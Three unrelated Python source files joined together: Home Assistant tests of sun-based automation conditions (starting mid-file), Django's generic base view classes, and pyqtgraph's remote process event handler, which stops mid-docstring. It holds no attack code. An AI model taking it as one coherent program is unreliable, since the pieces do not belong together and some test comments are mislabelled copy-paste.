"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:32:43 local, sunset: 2015-09-16 18:55:24 local
# sunrise: 2015-09-16 13:32:43 UTC, sunset: 2015-09-17 01:55:24 UTC
# now = local midnight -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = sunset + 1s + 1h -> 'before sunset' with offset +1h not true
now = datetime(2015, 9, 17, 2, 55, 25, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = sunset + 1h -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 17, 2, 55, 24, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = UTC midnight -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 17, 0, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 3
# now = UTC midnight - 1s -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 16, 23, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 4
# now = sunrise -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 16, 13, 32, 43, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 5
# now = sunrise -1s -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 16, 13, 32, 42, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 6
# now = local midnight-1s -> 'after sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 6
async def test_if_action_after_sunrise_with_offset(hass, calls):
"""
Test if action was after sunrise with offset.
After sunrise is true from sunrise until midnight, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"after": SUN_EVENT_SUNRISE,
"after_offset": "+1:00:00",
},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:32:43 local, sunset: 2015-09-16 18:55:24 local
# sunrise: 2015-09-16 13:32:43 UTC, sunset: 2015-09-17 01:55:24 UTC
# now = sunrise - 1s + 1h -> 'after sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 14, 32, 42, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# now = sunrise + 1h -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 16, 14, 32, 43, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = UTC noon -> 'after sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 12, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = UTC noon - 1s -> 'after sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 11, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local noon -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 16, 19, 1, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = local noon - 1s -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 16, 18, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 3
# now = sunset -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 17, 1, 55, 24, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 4
# now = sunset + 1s -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 17, 1, 55, 25, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 5
# now = local midnight-1s -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 6
# now = local midnight -> 'after sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 6
async def test_if_action_after_sunset_with_offset(hass, calls):
"""
Test if action was after sunset with offset.
After sunset is true from sunset until midnight, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"after": "sunset",
"after_offset": "+1:00:00",
},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-15 06:32:05 local, sunset: 2015-09-15 18:56:46 local
# sunrise: 2015-09-15 13:32:05 UTC, sunset: 2015-09-16 01:56:46 UTC
# now = sunset - 1s + 1h -> 'after sunset' with offset +1h not true
now = datetime(2015, 9, 16, 2, 56, 45, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# now = sunset + 1h -> 'after sunset' with offset +1h true
now = datetime(2015, 9, 16, 2, 56, 46, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = midnight-1s -> 'after sunset' with offset +1h true
now = datetime(2015, 9, 16, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = midnight -> 'after sunset' with offset +1h not true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
async def test_if_action_before_and_after_during(hass, calls):
"""
Test if action was after sunset and before sunrise.
This is true from sunrise until sunset.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"after": SUN_EVENT_SUNRISE,
"before": SUN_EVENT_SUNSET,
},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:32:43 local, sunset: 2015-09-16 18:55:24 local
# sunrise: 2015-09-16 13:32:43 UTC, sunset: 2015-09-17 01:55:24 UTC
# now = sunrise - 1s -> 'after sunrise' + 'before sunset' not true
now = datetime(2015, 9, 16, 13, 32, 42, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# now = sunset + 1s -> 'after sunrise' + 'before sunset' not true
now = datetime(2015, 9, 17, 1, 55, 25, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# now = sunrise -> 'after sunrise' + 'before sunset' true
now = datetime(2015, 9, 16, 13, 32, 43, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = sunset -> 'after sunrise' + 'before sunset' true
now = datetime(2015, 9, 17, 1, 55, 24, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = 9AM local -> 'after sunrise' + 'before sunset' true
now = datetime(2015, 9, 16, 16, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 3
async def test_if_action_before_sunrise_no_offset_kotzebue(hass, calls):
"""
Test if action was before sunrise.
Local timezone: Alaska time
Location: Kotzebue, which has a very skewed local timezone with sunrise
at 7 AM and sunset at 3AM during summer
After sunrise is true from sunrise until midnight, local time.
"""
tz = dt_util.get_time_zone("America/Anchorage")
dt_util.set_default_time_zone(tz)
hass.config.latitude = 66.5
hass.config.longitude = 162.4
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "before": SUN_EVENT_SUNRISE},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-07-24 07:17:24 local, sunset: 2015-07-25 03:16:27 local
# sunrise: 2015-07-24 15:17:24 UTC, sunset: 2015-07-25 11:16:27 UTC
# now = sunrise + 1s -> 'before sunrise' not true
now = datetime(2015, 7, 24, 15, 17, 25, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# now = sunrise -> 'before sunrise' true
now = datetime(2015, 7, 24, 15, 17, 24, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight -> 'before sunrise' true
now = datetime(2015, 7, 24, 8, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = local midnight - 1s -> 'before sunrise' not true
now = datetime(2015, 7, 24, 7, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
async def test_if_action_after_sunrise_no_offset_kotzebue(hass, calls):
"""
Test if action was after sunrise.
Local timezone: Alaska time
Location: Kotzebue, which has a very skewed local timezone with sunrise
at 7 AM and sunset at 3AM during summer
Before sunrise is true from midnight until sunrise, local time.
"""
tz = dt_util.get_time_zone("America/Anchorage")
dt_util.set_default_time_zone(tz)
hass.config.latitude = 66.5
hass.config.longitude = 162.4
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "after": SUN_EVENT_SUNRISE},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-07-24 07:17:24 local, sunset: 2015-07-25 03:16:27 local
# sunrise: 2015-07-24 15:17:24 UTC, sunset: 2015-07-25 11:16:27 UTC
# now = sunrise -> 'after sunrise' true
now = datetime(2015, 7, 24, 15, 17, 24, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = sunrise - 1s -> 'after sunrise' not true
now = datetime(2015, 7, 24, 15, 17, 23, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight -> 'after sunrise' not true
now = datetime(2015, 7, 24, 8, 0, 1, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight - 1s -> 'after sunrise' true
now = datetime(2015, 7, 24, 7, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
async def test_if_action_before_sunset_no_offset_kotzebue(hass, calls):
"""
Test if action was before sunrise.
Local timezone: Alaska time
Location: Kotzebue, which has a very skewed local timezone with sunrise
at 7 AM and sunset at 3AM during summer
Before sunset is true from midnight until sunset, local time.
"""
tz = dt_util.get_time_zone("America/Anchorage")
dt_util.set_default_time_zone(tz)
hass.config.latitude = 66.5
hass.config.longitude = 162.4
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "before": SUN_EVENT_SUNSET},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-07-24 07:17:24 local, sunset: 2015-07-25 03:16:27 local
# sunrise: 2015-07-24 15:17:24 UTC, sunset: 2015-07-25 11:16:27 UTC
# now = sunrise + 1s -> 'before sunrise' not true
now = datetime(2015, 7, 25, 11, 16, 28, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# now = sunrise -> 'before sunrise' true
now = datetime(2015, 7, 25, 11, 16, 27, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight -> 'before sunrise' true
now = datetime(2015, 7, 24, 8, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = local midnight - 1s -> 'before sunrise' not true
now = datetime(2015, 7, 24, 7, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
async def test_if_action_after_sunset_no_offset_kotzebue(hass, calls):
"""
Test if action was after sunrise.
Local timezone: Alaska time
Location: Kotzebue, which has a very skewed local timezone with sunrise
at 7 AM and sunset at 3AM during summer
After sunset is true from sunset until midnight, local time.
"""
tz = dt_util.get_time_zone("America/Anchorage")
dt_util.set_default_time_zone(tz)
hass.config.latitude = 66.5
hass.config.longitude = 162.4
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "after": SUN_EVENT_SUNSET},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-07-24 07:17:24 local, sunset: 2015-07-25 03:16:27 local
# sunrise: 2015-07-24 15:17:24 UTC, sunset: 2015-07-25 11:16:27 UTC
# now = sunset -> 'after sunset' true
now = datetime(2015, 7, 25, 11, 16, 27, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = sunset - 1s -> 'after sunset' not true
now = datetime(2015, 7, 25, 11, 16, 26, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight -> 'after sunset' not true
now = datetime(2015, 7, 24, 8, 0, 1, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight - 1s -> 'after sunset' true
now = datetime(2015, 7, 24, 7, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
|
|
from __future__ import unicode_literals
import logging
from functools import update_wrapper
from django import http
from django.core.exceptions import ImproperlyConfigured
from django.core.urlresolvers import reverse, NoReverseMatch
from django.template.response import TemplateResponse
from django.utils.decorators import classonlymethod
from django.utils import six
logger = logging.getLogger('django.request')
class ContextMixin(object):
"""
A default context mixin that passes the keyword arguments received by
get_context_data as the template context.
"""
def get_context_data(self, **kwargs):
if 'view' not in kwargs:
kwargs['view'] = self
return kwargs
class View(object):
"""
Intentionally simple parent class for all views. Only implements
dispatch-by-method and simple sanity checking.
"""
http_method_names = ['get', 'post', 'put', 'patch', 'delete', 'head', 'options', 'trace']
def __init__(self, **kwargs):
"""
Constructor. Called in the URLconf; can contain helpful extra
keyword arguments, and other things.
"""
# Go through keyword arguments, and either save their values to our
# instance, or raise an error.
for key, value in six.iteritems(kwargs):
setattr(self, key, value)
@classonlymethod
def as_view(cls, **initkwargs):
"""
Main entry point for a request-response process.
"""
# sanitize keyword arguments
for key in initkwargs:
if key in cls.http_method_names:
raise TypeError("You tried to pass in the %s method name as a "
"keyword argument to %s(). Don't do that."
% (key, cls.__name__))
if not hasattr(cls, key):
raise TypeError("%s() received an invalid keyword %r. as_view "
"only accepts arguments that are already "
"attributes of the class." % (cls.__name__, key))
def view(request, *args, **kwargs):
self = cls(**initkwargs)
if hasattr(self, 'get') and not hasattr(self, 'head'):
self.head = self.get
self.request = request
self.args = args
self.kwargs = kwargs
return self.dispatch(request, *args, **kwargs)
# take name and docstring from class
update_wrapper(view, cls, updated=())
# and possible attributes set by decorators
# like csrf_exempt from dispatch
update_wrapper(view, cls.dispatch, assigned=())
return view
def dispatch(self, request, *args, **kwargs):
# Try to dispatch to the right method; if a method doesn't exist,
# defer to the error handler. Also defer to the error handler if the
# request method isn't on the approved list.
if request.method.lower() in self.http_method_names:
handler = getattr(self, request.method.lower(), self.http_method_not_allowed)
else:
handler = self.http_method_not_allowed
return handler(request, *args, **kwargs)
def http_method_not_allowed(self, request, *args, **kwargs):
logger.warning('Method Not Allowed (%s): %s', request.method, request.path,
extra={
'status_code': 405,
'request': self.request
}
)
return http.HttpResponseNotAllowed(self._allowed_methods())
def options(self, request, *args, **kwargs):
"""
Handles responding to requests for the OPTIONS HTTP verb.
"""
response = http.HttpResponse()
response['Allow'] = ', '.join(self._allowed_methods())
response['Content-Length'] = '0'
return response
def _allowed_methods(self):
return [m.upper() for m in self.http_method_names if hasattr(self, m)]
class TemplateResponseMixin(object):
"""
A mixin that can be used to render a template.
"""
template_name = None
response_class = TemplateResponse
content_type = None
def render_to_response(self, context, **response_kwargs):
"""
Returns a response, using the `response_class` for this
view, with a template rendered with the given context.
If any keyword arguments are provided, they will be
passed to the constructor of the response class.
"""
response_kwargs.setdefault('content_type', self.content_type)
return self.response_class(
request=self.request,
template=self.get_template_names(),
context=context,
**response_kwargs
)
def get_template_names(self):
"""
Returns a list of template names to be used for the request. Must return
a list. May not be called if render_to_response is overridden.
"""
if self.template_name is None:
raise ImproperlyConfigured(
"TemplateResponseMixin requires either a definition of "
"'template_name' or an implementation of 'get_template_names()'")
else:
return [self.template_name]
class TemplateView(TemplateResponseMixin, ContextMixin, View):
"""
A view that renders a template. This view will also pass into the context
any keyword arguments passed by the url conf.
"""
def get(self, request, *args, **kwargs):
context = self.get_context_data(**kwargs)
return self.render_to_response(context)
class RedirectView(View):
"""
A view that provides a redirect on any GET request.
"""
permanent = True
url = None
pattern_name = None
query_string = False
def get_redirect_url(self, *args, **kwargs):
"""
Return the URL redirect to. Keyword arguments from the
URL pattern match generating the redirect request
are provided as kwargs to this method.
"""
if self.url:
url = self.url % kwargs
elif self.pattern_name:
try:
url = reverse(self.pattern_name, args=args, kwargs=kwargs)
except NoReverseMatch:
return None
else:
return None
args = self.request.META.get('QUERY_STRING', '')
if args and self.query_string:
url = "%s?%s" % (url, args)
return url
def get(self, request, *args, **kwargs):
url = self.get_redirect_url(*args, **kwargs)
if url:
if self.permanent:
return http.HttpResponsePermanentRedirect(url)
else:
return http.HttpResponseRedirect(url)
else:
logger.warning('Gone: %s', self.request.path,
extra={
'status_code': 410,
'request': self.request
})
return http.HttpResponseGone()
def head(self, request, *args, **kwargs):
return self.get(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
return self.get(request, *args, **kwargs)
def options(self, request, *args, **kwargs):
return self.get(request, *args, **kwargs)
def delete(self, request, *args, **kwargs):
return self.get(request, *args, **kwargs)
def put(self, request, *args, **kwargs):
return self.get(request, *args, **kwargs)
def patch(self, request, *args, **kwargs):
return self.get(request, *args, **kwargs)
|
|
import os, time, sys, traceback, weakref
import numpy as np
import threading
try:
import __builtin__ as builtins
import cPickle as pickle
except ImportError:
import builtins
import pickle
# color printing for debugging
from ..util import cprint
class ClosedError(Exception):
"""Raised when an event handler receives a request to close the connection
or discovers that the connection has been closed."""
pass
class NoResultError(Exception):
"""Raised when a request for the return value of a remote call fails
because the call has not yet returned."""
pass
class RemoteEventHandler(object):
"""
This class handles communication between two processes. One instance is present on
each process and listens for communication from the other process. This enables
(amongst other things) ObjectProxy instances to look up their attributes and call
their methods.
This class is responsible for carrying out actions on behalf of the remote process.
Each instance holds one end of a Connection which allows python
objects to be passed between processes.
For the most common operations, see _import(), close(), and transfer()
To handle and respond to incoming requests, RemoteEventHandler requires that its
processRequests method is called repeatedly (this is usually handled by the Process
classes defined in multiprocess.processes).
"""
handlers = {} ## maps {process ID : handler}. This allows unpickler to determine which process
## an object proxy belongs to
def __init__(self, connection, name, pid, debug=False):
self.debug = debug
self.conn = connection
self.name = name
self.results = {} ## reqId: (status, result); cache of request results received from the remote process
## status is either 'result' or 'error'
## if 'error', then result will be (exception, formatted exceprion)
## where exception may be None if it could not be passed through the Connection.
self.resultLock = threading.RLock()
self.proxies = {} ## maps {weakref(proxy): proxyId}; used to inform the remote process when a proxy has been deleted.
self.proxyLock = threading.RLock()
## attributes that affect the behavior of the proxy.
## See ObjectProxy._setProxyOptions for description
self.proxyOptions = {
'callSync': 'sync', ## 'sync', 'async', 'off'
'timeout': 10, ## float
'returnType': 'auto', ## 'proxy', 'value', 'auto'
'autoProxy': False, ## bool
'deferGetattr': False, ## True, False
'noProxyTypes': [ type(None), str, int, float, tuple, list, dict, LocalObjectProxy, ObjectProxy ],
}
if int(sys.version[0]) < 3:
self.proxyOptions['noProxyTypes'].append(unicode)
else:
self.proxyOptions['noProxyTypes'].append(bytes)
self.optsLock = threading.RLock()
self.nextRequestId = 0
self.exited = False
# Mutexes to help prevent issues when multiple threads access the same RemoteEventHandler
self.processLock = threading.RLock()
self.sendLock = threading.RLock()
RemoteEventHandler.handlers[pid] = self ## register this handler as the one communicating with pid
@classmethod
def getHandler(cls, pid):
try:
return cls.handlers[pid]
except:
print(pid, cls.handlers)
raise
def debugMsg(self, msg, *args):
if not self.debug:
return
cprint.cout(self.debug, "[%d] %s\n" % (os.getpid(), str(msg)%args), -1)
def getProxyOption(self, opt):
with self.optsLock:
return self.proxyOptions[opt]
def setProxyOptions(self, **kwds):
"""
Set the default behavior options for object proxies.
See ObjectProxy._setProxyOptions for more info.
"""
with self.optsLock:
self.proxyOptions.update(kwds)
def processRequests(self):
"""Process all pending requests from the pipe, return
after no more events are immediately available. (non-blocking)
Returns the number of events processed.
"""
with self.processLock:
if self.exited:
self.debugMsg(' processRequests: exited already; raise ClosedError.')
raise ClosedError()
numProcessed = 0
while self.conn.poll():
#try:
#poll = self.conn.poll()
#if not poll:
#break
#except IOError: # this can happen if the remote process dies.
## might it also happen in other circumstances?
#raise ClosedError()
try:
self.handleRequest()
numProcessed += 1
except ClosedError:
self.debugMsg('processRequests: got ClosedError from handleRequest; setting exited=True.')
self.exited = True
raise
#except IOError as err: ## let handleRequest take care of this.
#self.debugMsg(' got IOError from handleRequest; try again.')
#if err.errno == 4: ## interrupted system call; try again
#continue
#else:
#raise
except:
print("Error in process %s" % self.name)
sys.excepthook(*sys.exc_info())
if numProcessed > 0:
self.debugMsg('processRequests: finished %d requests', numProcessed)
return numProcessed
def handleRequest(self):
"""Handle a single request from the remote process.
Blocks until a request is available."""
result = None
while True:
try:
## args, kwds are double-pickled to ensure this recv() call never fails
cmd, reqId, nByteMsgs, optStr = self.conn.recv()
break
except EOFError:
self.debugMsg(' handleRequest: got EOFError from recv; raise ClosedError.')
## remote process has shut down; end event loop
raise ClosedError()
except IOError as err:
if err.errno == 4: ## interrupted system call; try again
self.debugMsg(' handleRequest: got IOError 4 from recv; try again.')
continue
else:
self.debugMsg(' handleRequest: got IOError %d from recv (%s); raise ClosedError.', err.errno, err.strerror)
raise ClosedError()
self.debugMsg(" handleRequest: received %s %s", cmd, reqId)
## read byte messages following the main request
byteData = []
if nByteMsgs > 0:
self.debugMsg(" handleRequest: reading %d byte messages", nByteMsgs)
for i in range(nByteMsgs):
while True:
try:
byteData.append(self.conn.recv_bytes())
break
except EOFError:
self.debugMsg(" handleRequest: got EOF while reading byte messages; raise ClosedError.")
raise ClosedError()
except IOError as err:
if err.errno == 4:
self.debugMsg(" handleRequest: got IOError 4 while reading byte messages; try again.")
continue
else:
self.debugMsg(" handleRequest: got IOError while reading byte messages; raise ClosedError.")
raise ClosedError()
try:
if cmd == 'result' or cmd == 'error':
resultId = reqId
reqId = None ## prevents attempt to return information from this request
## (this is already a return from a previous request)
opts = pickle.loads(optStr)
self.debugMsg(" handleRequest: id=%s opts=%s", reqId, opts)
#print os.getpid(), "received request:", cmd, reqId, opts
returnType = opts.get('returnType', 'auto')
if cmd == 'result':
with self.resultLock:
self.results[resultId] = ('result', opts['result'])
elif cmd == 'error':
with self.resultLock:
self.results[resultId] = ('error', (opts['exception'], opts['excString']))
elif cmd == 'getObjAttr':
result = getattr(opts['obj'], opts['attr'])
elif cmd == 'callObj':
obj = opts['obj']
fnargs = opts['args']
fnkwds = opts['kwds']
## If arrays were sent as byte messages, they must be re-inserted into the
## arguments
if len(byteData) > 0:
for i,arg in enumerate(fnargs):
if isinstance(arg, tuple) and len(arg) > 0 and arg[0] == '__byte_message__':
ind = arg[1]
dtype, shape = arg[2]
fnargs[i] = np.fromstring(byteData[ind], dtype=dtype).reshape(shape)
for k,arg in fnkwds.items():
if isinstance(arg, tuple) and len(arg) > 0 and arg[0] == '__byte_message__':
ind = arg[1]
dtype, shape = arg[2]
fnkwds[k] = np.fromstring(byteData[ind], dtype=dtype).reshape(shape)
if len(fnkwds) == 0: ## need to do this because some functions do not allow keyword arguments.
try:
result = obj(*fnargs)
except:
print("Failed to call object %s: %d, %s" % (obj, len(fnargs), fnargs[1:]))
raise
else:
result = obj(*fnargs, **fnkwds)
elif cmd == 'getObjValue':
result = opts['obj'] ## has already been unpickled into its local value
returnType = 'value'
elif cmd == 'transfer':
result = opts['obj']
returnType = 'proxy'
elif cmd == 'transferArray':
## read array data from next message:
result = np.fromstring(byteData[0], dtype=opts['dtype']).reshape(opts['shape'])
returnType = 'proxy'
elif cmd == 'import':
name = opts['module']
fromlist = opts.get('fromlist', [])
mod = builtins.__import__(name, fromlist=fromlist)
if len(fromlist) == 0:
parts = name.lstrip('.').split('.')
result = mod
for part in parts[1:]:
result = getattr(result, part)
else:
result = map(mod.__getattr__, fromlist)
elif cmd == 'del':
LocalObjectProxy.releaseProxyId(opts['proxyId'])
#del self.proxiedObjects[opts['objId']]
elif cmd == 'close':
if reqId is not None:
result = True
returnType = 'value'
exc = None
except:
exc = sys.exc_info()
if reqId is not None:
if exc is None:
self.debugMsg(" handleRequest: sending return value for %d: %s", reqId, result)
#print "returnValue:", returnValue, result
if returnType == 'auto':
with self.optsLock:
noProxyTypes = self.proxyOptions['noProxyTypes']
result = self.autoProxy(result, noProxyTypes)
elif returnType == 'proxy':
result = LocalObjectProxy(result)
try:
self.replyResult(reqId, result)
except:
sys.excepthook(*sys.exc_info())
self.replyError(reqId, *sys.exc_info())
else:
self.debugMsg(" handleRequest: returning exception for %d", reqId)
self.replyError(reqId, *exc)
elif exc is not None:
sys.excepthook(*exc)
if cmd == 'close':
if opts.get('noCleanup', False) is True:
os._exit(0) ## exit immediately, do not pass GO, do not collect $200.
## (more importantly, do not call any code that would
## normally be invoked at exit)
else:
raise ClosedError()
def replyResult(self, reqId, result):
self.send(request='result', reqId=reqId, callSync='off', opts=dict(result=result))
def replyError(self, reqId, *exc):
print("error: %s %s %s" % (self.name, str(reqId), str(exc[1])))
excStr = traceback.format_exception(*exc)
try:
self.send(request='error', reqId=reqId, callSync='off', opts=dict(exception=exc[1], excString=excStr))
except:
self.send(request='error', reqId=reqId, callSync='off', opts=dict(exception=None, excString=excStr))
def send(self, request, opts=None, reqId=None, callSync='sync', timeout=10, returnType=None, byteData=None, **kwds):
"""Send a request or return packet to the remote process.
Generally it is not necessary to call this method directly; it is for internal use.
(The docstring has information that is nevertheless useful to the programmer
as it describes the internal protocol used to communicate between processes)
============== ====================================================================
**Arguments:**
request String describing the type of request being sent (see below)
reqId Integer uniquely linking a result back to the request that generated
it. (most requests leave this blank)
callSync 'sync': return the actual result of the request
'async': return a Request object which can be used to look up the
result later
'off': return no result
timeout Time in seconds to wait for a response when callSync=='sync'
opts Extra arguments sent to the remote process that determine the way
the request will be handled (see below)
returnType 'proxy', 'value', or 'auto'
byteData If specified, this is a list of objects to be sent as byte messages
to the remote process.
This is used to send large arrays without the cost of pickling.
============== ====================================================================
